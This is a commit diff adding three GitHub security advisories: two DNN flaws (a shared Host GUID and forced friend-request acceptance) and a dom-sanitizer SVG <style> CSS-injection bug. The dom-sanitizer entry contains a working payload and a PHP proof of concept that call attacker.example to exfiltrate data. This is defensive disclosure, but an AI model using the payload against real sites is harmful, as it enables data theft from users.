Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 7919deb44bcd · 2026-04-10T21:09:11.000Z
GHSA-2rhw-gw3f-477j GHSA-93vf-569f-22cq GHSA-fpj4-9qhx-5m6m
diff --git a/advisories/github-reviewed/2026/04/GHSA-2rhw-gw3f-477j/GHSA-2rhw-gw3f-477j.json b/advisories/github-reviewed/2026/04/GHSA-2rhw-gw3f-477j/GHSA-2rhw-gw3f-477j.json
@@ -0,0 +1,54 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-2rhw-gw3f-477j",
+  "modified": "2026-04-10T21:07:13Z",
+  "published": "2026-04-10T21:07:13Z",
+  "aliases": [],
+  "summary": "DNN: Same HostGUID for all new installs",
+  "details": "All new installations DNN 10.x.x - 10.2.1 installs, have the same Host GUID. This does not affect upgrades from 9.x.x.",
+  "severity": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "NuGet",
+        "name": "DotNetNuke.Core"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "10.0.0"
+            },
+            {
+              "fixed": "10.2.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-2rhw-gw3f-477j"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/dnnsoftware/Dnn.Platform"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v10.2.2"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-330"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-10T21:07:13Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-93vf-569f-22cq/GHSA-93vf-569f-22cq.json b/advisories/github-reviewed/2026/04/GHSA-93vf-569f-22cq/GHSA-93vf-569f-22cq.json
@@ -0,0 +1,63 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-93vf-569f-22cq",
+  "modified": "2026-04-10T21:08:31Z",
+  "published": "2026-04-10T21:08:30Z",
+  "aliases": [],
+  "summary": "rhukster/dom-sanitizer: SVG <style> tag allows CSS injection via unfiltered url() and @import directives",
+  "details": "### Summary\nDOMSanitizer::sanitize() allows <style> elements in SVG content but never inspects their text content. CSS url() references and @import rules pass through unfiltered, causing the browser to issue HTTP requests to attacker-controlled hosts when the sanitized SVG is rendered.\n\n### Details\nIn src/DOMSanitizer.php, 'style' is listed in the SVG allowed-tag array (line 31). The sanitize() method (lines 111–133) removes disallowed tags and strips attributes matching the EXTERNAL_URL pattern — but text node content of <style> elements is never examined. Because CSS rules live in text nodes, EXTERNAL_URL filtering never applies to them.\n\nVulnerable code (src/DOMSanitizer.php, line 31):\n```php\n'svg' => ['style', 'path', 'rect', 'circle', ...],\n```\n\nThe following payload survives sanitize() intact:\n```svg\n<svg xmlns=\"http://www.w3.org/2000/svg\">\n  <style>* { background: url(https://attacker.example/collect); }</style>\n</svg>\n```\n\n### PoC\n```php\n<?php\nrequire 'vendor/autoload.php';\nuse Rhukster\\DomSanitizer\\DOMSanitizer;\n\n$svg = '<svg xmlns=\"http://www.w3.org/2000/svg\"><style>* { background: url(https://attacker.example/collect); }</style></svg>';\n$sanitizer = new DOMSanitizer(DOMSanitizer::SVG);\n$output = $sanitizer->sanitize($svg);\necho $output; // <style> with url() survives unchanged — confirmed exploitable in Statamic CMS (GHSA-g8hv-8w5p-cvqg)\n```\n\nRender the returned string in a browser. The browser sends a GET request to https://attacker.example/collect.\n\n### Impact\nAny application that passes user-controlled SVG through DOMSanitizer::sanitize() and renders the output in a browser is vulnerable. An attacker can exfiltrate the page URL to an external server, load arbitrary external stylesheets, and on some browsers leverage CSS attribute selectors + url() to exfiltrate cookie or session token values.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "rhukster/dom-sanitizer"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.0.10"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/rhukster/dom-sanitizer/security/advisories/GHSA-93vf-569f-22cq"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/rhukster/dom-sanitizer/commit/49a98046b708a4c92f754f5b0ef1720bb85142e2"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/rhukster/dom-sanitizer"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/rhukster/dom-sanitizer/releases/tag/1.0.10"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-10T21:08:30Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-fpj4-9qhx-5m6m/GHSA-fpj4-9qhx-5m6m.json b/advisories/github-reviewed/2026/04/GHSA-fpj4-9qhx-5m6m/GHSA-fpj4-9qhx-5m6m.json
@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-fpj4-9qhx-5m6m",
+  "modified": "2026-04-10T21:07:08Z",
+  "published": "2026-04-10T21:07:08Z",
+  "aliases": [],
+  "summary": "DNN: Force Friend Request Acceptance",
+  "details": "In the friends feature, a user could craft a request that would force the acceptance of a friend request on another user.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "NuGet",
+        "name": "DotNetNuke.Core"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "6.0.0"
+            },
+            {
+              "fixed": "10.2.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-fpj4-9qhx-5m6m"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/dnnsoftware/Dnn.Platform"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/dnnsoftware/Dnn.Platform/releases/tag/v10.2.2"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-285"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-10T21:07:08Z",
+    "nvd_published_at": null
+  }
+}
